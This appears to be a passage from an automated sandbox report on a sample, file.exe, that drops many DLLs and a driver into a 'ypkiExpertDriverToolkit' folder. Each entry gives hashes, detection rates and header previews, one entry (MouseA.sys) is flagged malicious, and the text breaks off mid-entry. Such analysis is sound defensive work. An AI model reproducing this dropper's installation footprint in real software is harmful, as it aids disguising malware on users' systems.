                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............bm..bm..bm...e..bm...m..bm...i..bm......bm...o..bm.Rich.bm.........................PE..d...}............" .........................................................P............`A........................................@,..T............0.......................@.......,..T............................................................................text............................... ..`.data........ ......................@..@.rsrc........0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\KBDFA.DLL

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7168
                    Entropy (8bit):3.2342270572683556
                    Encrypted:false
                    SSDEEP:
                    MD5:498FC0CA1221D28A3926E864DFC1438E
                    SHA1:E2CCFBE85226151C6BCC08871C2148AA67F5A00B
                    SHA-256:CDFD17C17EC6487C501442D40989FA0260FB3AFD826DC13B3ED530686CA9BE58
                    SHA-512:2D2E209B987CBB0B4C3D2470CC9F027AAAE9F9F695A2A4B79E628E2994BF611BF8D67A560C9389C67D550B2015AF0BCE4EEDDC85697A0F13485EE1930078E0B4
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............bm..bm..bm...e..bm...m..bm...i..bm......bm...o..bm.Rich.bm.........................PE..d................" .........................................................P......r.....`A.........................................-..P............0.......................@......0...T............................................................................text............................... ..`.data...x.... ......................@..@.rsrc........0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\KBDIR.DLL

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7168
                    Entropy (8bit):3.256774261740101
                    Encrypted:false
                    SSDEEP:
                    MD5:6811753272C029CCC6CFFA3D34C43555
                    SHA1:810BFE36E716C0F483DFA0968ACC82E6117C71E8
                    SHA-256:678D72BC349DC46021EEC11C334F7B0FA54F56FA5C5FD67AF4DC7003C7088C7F
                    SHA-512:589DAE9AEBBDBDB31A27EC855D702DAC307660596471AC05A7498B4D0106D5C7FA873D4FF5EED951E206D8CF4D9BCFE90085D0283FD52BFCE8918068BCC470A1
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............bm..bm..bm...e..bm...m..bm...i..bm......bm...o..bm.Rich.bm.........................PE..d...;............" .........................................................P............`A........................................0...P............0.......................@..........T............................................................................text............................... ..`.data........ ......................@..@.rsrc........0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\KBDIT.DLL

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7168
                    Entropy (8bit):3.1614292531372286
                    Encrypted:false
                    SSDEEP:
                    MD5:CF3FD3CB4C320A8290E77D0AE89CDD7B
                    SHA1:59016B7C511D5A34E32B003DBA550CE78C1E6929
                    SHA-256:3F6E358AB55E08C01E1994F8D95F7EF18FF67EDB8BDD1900AB730A4CE0BE539E
                    SHA-512:8347FD2C84DBB3111D6D6DC65C1FC0D2E4D83FE4DCF87048F19FA32C610D40093919201FB44B43531E63A58C0226585C80CD9D9089F100EFCCE48D38CFAB6AEC
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............bm..bm..bm...e..bm...m..bm...i..bm......bm...o..bm.Rich.bm.........................PE..d......V.........." .........................................................P......./....`A........................................@-..P............0.......................@.......-..T............................................................................text............................... ..`.data........ ......................@..@.rsrc........0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\KBDKYR.DLL

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7168
                    Entropy (8bit):3.2776592886272344
                    Encrypted:false
                    SSDEEP:
                    MD5:636F37494CB0E056C822852AB7330562
                    SHA1:230768C17896142FDBE02B1E65D07781EFA4012A
                    SHA-256:1E69261170C14B50A3FDB3B91E412FD72E4A0D201724F2AF0B87F856EFFFFE88
                    SHA-512:077E5727A790708F294E12C71407BEB412223529DB9F1A459EBCC4FE78086241B54D5837523208CFAE7E36C00A92FA06C9293771A4F065FA98600AAB64CA8E8D
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............bm..bm..bm...e..bm...m..bm...i..bm......bm...o..bm.Rich.bm.........................PE..d....u1..........." .........................................................P............`A.........................................-..P............0.......................@......@...T............................................................................text............................... ..`.data........ ......................@..@.rsrc........0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\KBDLT.DLL

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7168
                    Entropy (8bit):3.216005685576888
                    Encrypted:false
                    SSDEEP:
                    MD5:CAD729C1D90EA0E52B62CAD30DD4D3CD
                    SHA1:13B6D7FC37BE7974B222022BFE2ED93A0741D6F7
                    SHA-256:188B515505300A1E597E10F1C9BB89D170448F8CD506C3CCA805D7908803C82E
                    SHA-512:20698BD016380E0E24E32D005A3150E6EFFE537D8969CEA9ED19E1791451CC946862DB31F9757347A9DFC2CE8FAEC0318FE0251FB70A5EDEADA2D37A4428E57F
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............bm..bm..bm...e..bm...m..bm...i..bm......bm...o..bm.Rich.bm.........................PE..d....[,..........." .........................................................P............`A.........................................-..P............0.......................@......P...T............................................................................text............................... ..`.data........ ......................@..@.rsrc........0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\KBDUR.DLL

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7168
                    Entropy (8bit):3.254054155302049
                    Encrypted:false
                    SSDEEP:
                    MD5:622290D9A35B442E9468D50D3D87C727
                    SHA1:3BAB1B1D7BC40AAF8BE3D38BEFBF6761C4CFACD5
                    SHA-256:EF801F5579D568E4E0F91EAED217E3E130F886A9BF988D50C2692295B6E628BA
                    SHA-512:6FD9182C6C8E3814D8BE07B51CC2D5FDD4C3F62E4ACD19DC714426C64EF0AAFFA1C36007063BFB2B63DE846955D62FF5771AD58E89BE684244CBFF28933B7DC5
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............bm..bm..bm...e..bm...m..bm...i..bm......bm...o..bm.Rich.bm.........................PE..d...Q.R4.........." .........................................................P......O.....`A.........................................-..P............0.......................@......0...T............................................................................text............................... ..`.data...x.... ......................@..@.rsrc........0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\KBDURDU.DLL

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (native) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):7168
                    Entropy (8bit):3.253458416267767
                    Encrypted:false
                    SSDEEP:
                    MD5:A60A7A452A2AB58196AF852CCB12A1E5
                    SHA1:B645C308239935A644E748D11110DC6EB0924DBB
                    SHA-256:CF2E9DA398AD515B234877AC1BAC52A8E232CCAE539E39ADC9F1FD43F21E8520
                    SHA-512:586EEB8FBDB5404642A4E8A445951908DC0597FC9097F600DB132ADCBE58CB54A2763F57B1C86AFF85B9FED70AC4FDEA7FFC192C89DC491F74326113F7AB9B5A
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............bm..bm..bm...e..bm...m..bm...i..bm......bm...o..bm.Rich.bm.........................PE..d................." .........................................................P.......V....`A.........................................-..T............0.......................@......P...T............................................................................text............................... ..`.data........ ......................@..@.rsrc........0......................@..B.reloc.......@......................@..B........................................................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\MapControlStringsRes.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.9115995100473677
                    Encrypted:false
                    SSDEEP:
                    MD5:751B20887F8CD4C7DBE60C884406E684
                    SHA1:E431E49AFAE48D4F99312CDFCD0D28FC028BF5C0
                    SHA-256:66C2CF82E04F7ADE1C3DEC195F1260AC88FD23890E755263FC6100A8A293B048
                    SHA-512:1C3CB8E7CA91EC97FAEC279A39159442566210926B1B3F24A94760D542573933EE6C78EB2372DE482970CBE9EFD12C6536E47B3DCED0B213FD55B8B9B4598953
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d................" .........................................................0.......S....`.......................................................... ..X...............................8............................................................................rdata..............................@..@.rsrc...X.... ......................@..@...............T...8...8..................$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... .....c....c....)H......................................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\Microsoft-WindowsPhone-SEManagementProvider.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.7455223194508496
                    Encrypted:false
                    SSDEEP:
                    MD5:013710AB6DE262C6E342571F1798D8C2
                    SHA1:A798AD46810E0799D36E20A84AE2564200FCB32D
                    SHA-256:CA68EFF48F1E5B6158CD0F45571805717A8364A3D34ED469F4C9E76CFE88FADA
                    SHA-512:D7BFC08E077C9FBBEF1954700363094F3B993619AF654E4E0764D81696CB7247D83D1EA2C0C82B381DEFDE7FBAF782B3E8C8C28FBDC1F7B167C8CDB8D0F4D5ED
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d...=.e..........." .........................................................0............`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....=.e.........T...8...8.......=.e.........$...................8....rdata..8...x....rdata$zzzdbg.... ..`....rsrc$01....` ..P....rsrc$02.... ......@:1m1..I=...[.n..AG.f..s=.e.........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\Microsoft.Bcl.AsyncInterfaces.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):26752
                    Entropy (8bit):6.512503595653532
                    Encrypted:false
                    SSDEEP:
                    MD5:970B6E6478AE3AB699F277D77DE0CD19
                    SHA1:5475CB28998D419B4714343FFA9511FF46322AC2
                    SHA-256:5DC372A10F345B1F00EC6A8FA1A2CE569F7E5D63E4F1F8631BE367E46BFA34F4
                    SHA-512:F3AD2088C5D3FCB770C6D8212650EED95507E107A34F9468CA9DB99DEFD8838443A95E0B59A5A6CB65A18EBBC529110C5348513A321B44223F537096C6D7D6E0
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$:............" ..0..4...........S... ...`....... ....................................`..................................S..O....`...............@...(...........R..T............................................ ............... ..H............text....3... ...4.................. ..`.rsrc........`.......6..............@..@.reloc...............>..............@..B.................S......H........'..P*..................,R........................................(....*..(....*^.(.......1...%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(.......2...%...}....*:.(......}....*..{....*z.(......}.......2...%...}....*V.(......}......}....*..{....*..{....*:.(......}....*..{....*..{....*"..}....*..{....*"..}....*..{

                    C:\ProgramData\ypkiExpertDriverToolkit\MouseA.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):61440
                    Entropy (8bit):5.650846023562622
                    Encrypted:false
                    SSDEEP:
                    MD5:27A2167328F9DA2C838DDFD5C794EED4
                    SHA1:D36EA7F1FF814F5E92AC511D37CFD63F472A3883
                    SHA-256:B90748CD7380273C0F3AC8FD108C9F31BB9B3ECA5F73474102FF5888402F9963
                    SHA-512:76F558B94700EA27579679BD550E53F665DFE1CCC78521CA98AA1EE0D156A2DDAF2442EEACD23384BCC4CB1E282F1816771B8DC9BC273C59565B21F2011B7A30
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............k..k..k.....k......k..Zd..k..k...k.....k.....k.....k.....k..Rich.k..........................PE..L......H...........!.....p...p......J...................................................................................y...T...<.......8#......................x...................................h...@...............0............................text...$g.......p.................. ..`.rdata........... ..................@..@.data...............................@....rsrc...8#.......0..................@..@.reloc..J...........................@..B........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\MouseA.sys

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (native) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):7874
                    Entropy (8bit):5.425071413525527
                    Encrypted:false
                    SSDEEP:
                    MD5:91A558079FB958D0F7B19151E6A25EF6
                    SHA1:D25768E9E5DB3D7120AB9A4D293F49498CD5E84F
                    SHA-256:8F1F21A76091CC54ADEA32A3D6184707468DB5AF981ED181E181DCB3B31E05D7
                    SHA-512:A1FCAA35C1CD33D4142CAFCCB589B0D0224D6A46D879C4B4D8387693234FA3B50215A32479DAA392130A192045440FAB68DDE0A653D800F82054C9F05BF13DE0
                    Malicious:true
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 2%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......kq../.r./.r./.r./.r...r./.s...r.v3a.*.r..6y.+.r...t...r.Rich/.r.................PE..L...~..G............................................................................nU......................................\...<...............................,....................................................................................text...*........................... ..h.data...............................@....STL................................@....CRT................................@...INIT................................ ....rsrc...............................@..B.reloc..............................@..B................................0.......D...........................8...H...Z...|...........................*...B...R...................................&...>...^...p...............................v...h...l...P...................~..G........B.......................

                    C:\ProgramData\ypkiExpertDriverToolkit\PhoneServiceRes.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.9622532044243663
                    Encrypted:false
                    SSDEEP:
                    MD5:C1C75F1B9245A04DE6447FAD88A51DCA
                    SHA1:4743EBCC7ED149E0555B3D9549CBA33FFC359DC1
                    SHA-256:9A750F38624F26279EAD82505DE61BF135D415F5C2B848C285BE795B637006ED
                    SHA-512:B7C71D1626030F279A4BA45E3E41C4E70990E0A4939F0BF26F5720A802239D113197358E1F1D82A40CBAEFC5104AE705A23F464AB9FED1C074EFBBFA2994EEA0
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d.....X.........." .........................................................0......P.....`A......................................................... ..H...............................T............................................................................rdata..............................@..@.rsrc...H.... ......................@..@......X........T...T...T.........X........$.................X............................T....rdata..T...|....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ......i.j.Rry..-..W.....h.kn..X............................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\PhoneutilRes.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.868512525902824
                    Encrypted:false
                    SSDEEP:
                    MD5:357441A9FF5DB367551B5E856A9CD09A
                    SHA1:ACE6145456C8789F31ECAFDBAFD104CBA0D64EC8
                    SHA-256:F4420763C56612BE947935B9984C45496EEF19921DB6AA898CD4939308F17BF2
                    SHA-512:CF79E8D0742ED56AFC82C948C902DC996619A137154F2DEB058A70D2FFBFB324BD9CC0BB5B4146DC08A71CED5C479E66EDEA1781FAB4115477C25A07CDB115D3
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d... S%..........." .........................................................0......f.....`.......................................................... ..8...............................8............................................................................rdata..............................@..@.rsrc...8.... ......................@..@.... S%.........T...8...8....... S%.........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...e".-..<.v..8..{C..{.._...s(. S%.........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\RDCameraDriver.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):17920
                    Entropy (8bit):5.275964420458713
                    Encrypted:false
                    SSDEEP:
                    MD5:5321A234E24E9B41C174939C08EE3C7B
                    SHA1:4CC06A932E896B63E4DD21AA21A2EBE85C119E64
                    SHA-256:0F2CD999F399E3D4CE3553DCD8A37565D8C6E0DA892F800B34378D8E5D4DBB0A
                    SHA-512:F59668A51BC435FC6E377154E0D2B330D31D428E4F9DB947D2853EDE7D40294679551D5353D46C14DE72A9AFF6C4C5A49BA62A57A65B3512DB29A563B174EB51
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........}..u...u...u.......u...v/..u...q/.u...t..u...t/..u...u/..u...}/..u.......u...w/..u.Rich..u.........................PE..d................." .........*.......#...............................................9....`A........................................`A..X....A.......p..P....`..................0...@<..p........................... 0..............81...............................text............................... ..`.rdata.......0......."..............@..@.data........P.......:..............@....pdata.......`.......<..............@..@.rsrc...P....p.......>..............@..@.reloc..0............D..............@..B........................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\RapidFireServer.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                    Category:dropped
                    Size (bytes):45464
                    Entropy (8bit):6.970430731040046
                    Encrypted:false
                    SSDEEP:
                    MD5:E38C864CD64C950B263C9C143F3FDEAC
                    SHA1:4C572EFE218F5B4F34AF2AFE406C54911A588DF9
                    SHA-256:008BE807FF56D97149C35EE09255D944856BA80557545E6140358A2E3CD95E0B
                    SHA-512:22137ACD8194C5FAEA027DD6A55792B9159E5F9B8F9F72C63D811BA2FCB52F65B79451C8E4FC03B12E47C71600FB21D8D43A7FD20B934567BA8B7EB4AD698EB7
                    Malicious:false
                    Antivirus:
                    • Antivirus: ReversingLabs, Detection: 0%
                    • Antivirus: Virustotal, Detection: 0%, Browse
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........5..f..f..f./f..f...g..f...g..f...g..f...g..f.:wf..f..f..fV..g..fV..g..fV.Cf..f..+f..fV..g..fRich..f........................PE..L....~.Z...........!.........&......t".......0......................................h.....@..........................8..(...8:.......................D...m..........03..T....................3.......3..@............0...............................text...y........................... ..`.rdata..J....0......."..............@..@.data........P.......4..............@....tls.........`.......6..............@....gfids..$....p.......8..............@..@.rsrc................:..............@..@.reloc...............@..............@..B........................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\RapidFireServer64.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):48560
                    Entropy (8bit):6.8419992641754055
                    Encrypted:false
                    SSDEEP:
                    MD5:4F66C69847E71AB33C67B5DA569853DC
                    SHA1:EB06870533E8A72654106592903BE91FD86F17F3
                    SHA-256:BA5046646C671C12E8A2A4B8D4BE4B06BF4630368E6F37AABA11E762E59FA78A
                    SHA-512:13AB83F8A9EABE6EC667187FA0C4475D4581264957B3D35B906F3D723C0CFD8917376610152DE74626D2A818CE8C13D7CD9B708E79A01D85FAD5568F9EB0EF8D
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............c.L.c.L.c.L...L.c.L.=.M.c.L.=.M.c.L.=.M.c.L.=.M.c.L..LL.c.L.c.L.c.LW=.M.c.LW=.M.c.LW=xL.c.L.c.L.c.LW=.M.c.LRich.c.L........................PE..d....~.Z.........." .....$...........'....................................................`..........................................L..(....N...............p.......P...m......$....D..T....................E..(....D...............@...............................text....".......$.................. ..`.rdata.......@.......(..............@..@.data........`.......>..............@....pdata.......p.......@..............@..@.tls.................D..............@....gfids.. ............F..............@..@.rsrc................H..............@..@.reloc..$............N..............@..B................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\SensorsCpl.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.9675232655624
                    Encrypted:false
                    SSDEEP:
                    MD5:8AE80EFAE1F18F4E260165D7B3D4E693
                    SHA1:0E2BD140F301854375959A23E81089E7B562306F
                    SHA-256:69A93FCEBC4FABBA8E7E869053FCF5A807E7645131BDD19AFD88F99A4638D8E5
                    SHA-512:2BE08158C050FA009457446D340D5FCC4572AAF8AD6EA34AEB6B43BD3EC59FF67EB89C2092958B85F8C1DE167560E8F59EB4C83E08B7DAE862DEC1D50DC5D884
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d...E.P[.........." .........................................................0.......o....`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....E.P[........T...8...8.......E.P[........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...=...._..}..........K.=..V..E.P[........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\SrEvents.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):5120
                    Entropy (8bit):3.194263702528508
                    Encrypted:false
                    SSDEEP:
                    MD5:446107D68A7F9F1E8A8EDDDEA64E4C55
                    SHA1:7E7BD3055539C1FE9F3BD7721077111E2233D8B4
                    SHA-256:36CE0D808A5BF49CAA8BCA12F8EB71D8C34C879DCC4208E94F47CF2D9D7995C1
                    SHA-512:EE4045A5D2236E877736FD23C67ACB4FE7880A1AECC2B1D8410D2795AD338AB957B9B0F4FA4D0D655F6A942B2D07CE04E56A23CEC79402FFBB61A629519462F1
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d.....o7.........." .........................................................0............`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@......o7........T...8...8.........o7........$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01.....!.......rsrc$02.... ......../.<...j..~.....:<X;....o7........................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\SyncRes.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                    Category:dropped
                    Size (bytes):2560
                    Entropy (8bit):2.815116226199511
                    Encrypted:false
                    SSDEEP:
                    MD5:A4155561137798A67C277660A03197E9
                    SHA1:EADAB5D7EAF3FBAB3543BC0AAA7A98B816DA85AA
                    SHA-256:F56DF7A6C02B90695A6B1B0F4BB97AC71CF673FA60D9DB2ED888837E87C43095
                    SHA-512:57F505F7FFBAE8F14B9C23A764FA60686878502DA70EDF4E40992DAC6793913717E23EEA996E5B40A61C08D1DCD1591FD71F838423B2AD11297F951F3065779B
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......5.<.q.R.q.R.q.R.e...p.R.e.P.p.R.Richq.R.PE..d................." .........................................................0......M.....`.......................................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@................T...8...8...................$...................8....rdata..8...x....rdata$zzzdbg.... .......rsrc$01..... ..X....rsrc$02.... ....H.L2..>.....e.o0.ip..Z...............................................................................................................................................................................................................................................................................................................................

                    C:\ProgramData\ypkiExpertDriverToolkit\System.Buffers.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):20856
                    Entropy (8bit):6.425485073687783
                    Encrypted:false
                    SSDEEP:
                    MD5:ECDFE8EDE869D2CCC6BF99981EA96400
                    SHA1:2F410A0396BC148ED533AD49B6415FB58DD4D641
                    SHA-256:ACCCCFBE45D9F08FFEED9916E37B33E98C65BE012CFFF6E7FA7B67210CE1FEFB
                    SHA-512:5FC7FEE5C25CB2EEE19737068968E00A00961C257271B420F594E5A0DA0559502D04EE6BA2D8D2AAD77F3769622F6743A5EE8DAE23F8F993F33FB09ED8DB2741
                    Malicious:false
                    Reputation:low
                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....jM^.........." ..0..$..........BC... ...`....... ....................................@..................................B..O....`..@...............x#...........A............................................... ............... ..H............text...H#... ...$.................. ..`.rsrc...@....`.......&..............@..@.reloc...............,..............@..B................$C......H........'...............?..X...8A......................................j~....%-.&(....s....%.....*..*...0..$.........(.....o.......&...,....o....,..*.*..................,!(....,..r...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*.~....*2r...p.(....*B.....(.........*R.....(...+%-.&(!...*^.....("....(...+&~....*.s$...*"..s%...*..(&...*.*....0......................

                    C:\ProgramData\ypkiExpertDriverToolkit\System.Runtime.CompilerServices.Unsafe.dll

                    Download File
                    Process:C:\Users\user\AppData\Local\Temp\Temp1_file.zip\file.exe
                    File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):18024
                    Entropy (8bit):6.343772893394079
                    Encrypted:false
                    SSDEEP:
                    MD5:C610E828B54001574D86DD2ED730E392
                    SHA1:180A7BAAFBC820A838BBACA434032D9D33CCEEBE
                    SHA-256:37768488E8EF45729BC7D9A2677633C6450042975BB96516E186DA6CB9CD0DCF
